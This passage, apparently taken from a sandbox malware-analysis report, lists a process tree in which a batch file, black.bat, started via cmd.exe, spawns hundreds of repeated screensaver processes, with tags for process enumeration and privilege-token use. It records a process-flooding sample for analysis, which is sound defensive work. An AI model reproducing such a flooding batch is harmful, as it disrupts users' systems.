    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1576
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4252
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1668
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2796
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1212
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2400
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4232
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2556
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:320
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1504
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2128
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4228
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2196
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4792
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4704
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1096
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3504
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:60
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1096
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4288
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4600
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2544
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2300
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4780
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3980
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2012
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:692
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2304
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1988
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:856
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2660
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1096
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3312
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1504
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2300
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4444
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:372
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2376
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1772
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4344
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:60
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1584
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4288
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3884
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1076
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4228
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4824
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:3680
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1380
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:112
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1960
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2460
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3812
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3748
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4872
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1940
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2388
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1364
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:100
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:216
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3852
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1848
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4268
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3404
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3744
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1880
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1384
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3360
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3504
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4704
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4644
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1412
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4664
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4340
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4120
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4824
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1548
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4784
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:116
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:240
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:748
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:804
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4228
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4344
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1004
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:204
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2764
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5104
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4288
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2304
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4120
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1500
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3852
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3320
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2388
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2012
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4600
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3708
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4024
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4244
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4444
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3168
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1940
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3852
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1656
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:604
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1920
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2716
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1492
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4816
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:100
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2408
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2536
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2412
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4448
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1952
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1584
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4816
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3672
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4552
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4464
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1076
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4360
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4644
